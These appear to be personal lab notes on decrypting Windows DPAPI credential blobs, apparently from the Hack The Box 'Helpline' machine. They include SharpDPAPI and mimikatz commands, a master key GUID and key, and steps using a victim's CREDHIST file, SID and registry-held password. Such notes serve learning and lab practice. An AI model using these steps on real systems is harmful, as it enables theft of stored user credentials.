DPAPI (Data Protection API)

windows, crypto

Overview #

01 00 00 00 D0 8C 9D DF 01 15 D1 11 8C 7A 00 C0 4F C2 97 EB

Relationship between different Windows security mechanism #

Decryption Overview #

Decrypting DPAPI Blob using passcape #

Enter the blob. I got the blob by converting the content of xml file into a bin file then transfer it to windows 10 vm.

# From attacker
cat admin-pass.xml | xxd -r -p > blob.bin

At this point, the software automatically detects the master key GUI to use. I also transferred the CREDHIST file of victim to my windows 10 vm.

Then I needed to get the user SID from mimikatz output. The password, well, I got it from registry.

Unfortunately, I only have a trial version of the program so It only showed 1st 10 characters of the decrypted data.

But this is a good thing, because atleast now I know there is a way to recover some data from dpapi blob. And also, I was able to validate what master key GUID and CREDHIST corresponds to the blob.

Next quesion is, what alternative tool I can use?

.\SharpDPAPI.exe blob /target:blob.bin '{98fafef2-d8a0-4b4f-917d-d8a1f5889c81}:DB6A7CB1AE10BFD70EA9BD8A4D10608A08D0969F'

Mimikatz Commands #

# Shows structure of blob
dpapi::blob /in:blob.bin

Master Key Characteristics #

Here is an example from HTB helpline mimikatz output

# This is also the filenames that you can see under
# `AppData\Roaming\Microsoft\Protect`
* GUID      :  {98fafef2-d8a0-4b4f-917d-d8a1f5889c81}

# The actual key in long format.
* MasterKey :  daae4d9c34452f4bc6a17ccf4d87c369a15fcd5f81be5fc7211721a321f309392578ec1c225647cc2048d
90854c7d94224cde619e23e04a0dbbaddb19efdf305

# Key in SHA1 format.
* sha1(key) :  db6a7cb1ae10bfd70ea9bd8a4d10608a08d0969f

Tools #

References #